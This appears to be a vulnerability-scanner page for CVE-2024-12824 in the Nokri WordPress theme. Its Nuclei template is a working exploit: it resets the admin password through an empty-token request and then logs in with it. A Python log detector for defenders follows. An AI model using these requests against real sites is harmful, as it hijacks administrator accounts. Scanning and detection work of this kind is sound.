Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
ID: CVE-2024-12824
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,intrusive,nokri,unauth
Description
The Nokri – Job Board WordPress Theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is because the theme does not properly check for an empty token value before updating user details such as the password. This makes it possible for unauthenticated attackers to change an arbitrary user’s password, including an administrator’s, and leverage that to gain access to the account.
YAML Source
id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.00091
    epss-percentile: 0.41121
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100f2d87123908e6899469beffe7b50904f1c2f5cdf7b6fe36a516f35cf4916f62602206d16c3c21e0d79a685c4b2374a5349157569ec4b042c67f6f789c9a7c682dc98:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-12824.yaml"
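
A defender-side check for the request shape this template sends, as an added example that is not part of the template or the theme's code: it parses logged admin-ajax.php POST bodies and flags sb_reset_password requests whose token is empty before the -sb-uid- marker. The function names, the sample log entries, and the assumption that a legitimate token has the form <key>-sb-uid-<user id> are illustrative.

```python
from urllib.parse import parse_qs

# Marker seen in the template's request body: token=<key>-sb-uid-<user id>.
# Assumption: a legitimate reset link carries a non-empty <key> before it.
SEP = "-sb-uid-"


def check_reset_body(body):
    """Classify one admin-ajax.php POST body.

    Returns None when the body is not an sb_reset_password request,
    otherwise a dict with the targeted user id and an empty-token flag.
    """
    outer = parse_qs(body, keep_blank_values=True)
    if outer.get("action", [""])[0] != "sb_reset_password":
        return None
    # sb_data is a nested URL-encoded form; parse_qs decoded one layer already.
    inner = parse_qs(outer.get("sb_data", [""])[0], keep_blank_values=True)
    token = inner.get("token", [""])[0]
    key, sep, uid = token.rpartition(SEP)
    if not sep:
        # No marker at all: treat a blank token as empty, anything else as malformed.
        return {"uid": None, "empty_token": token.strip() == "", "malformed": True}
    return {"uid": uid, "empty_token": key.strip() == "", "malformed": not uid.isdigit()}


def flag_suspicious(entries):
    """entries: iterable of (source, body). Returns [(source, uid)] for empty-token resets."""
    hits = []
    for source, body in entries:
        result = check_reset_body(body)
        if result and result["empty_token"]:
            hits.append((source, result["uid"]))
    return hits


# Constructed sample entries (documentation addresses, made-up token key).
SAMPLE = [
    ("192.0.2.10", "action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password%3dx&"),
    ("198.51.100.7", "action=sb_reset_password&sb_data=token%3dCONSTRUCTEDKEY-sb-uid-7%26sb_new_password%3dx"),
    ("203.0.113.5", "action=heartbeat&interval=60"),
]

if __name__ == "__main__":
    for source, uid in flag_suspicious(SAMPLE):
        print(f"empty reset token from {source} targeting user id {uid}")
```

This only works where POST bodies are captured, for example in a WAF or reverse-proxy audit log; standard access logs do not record them.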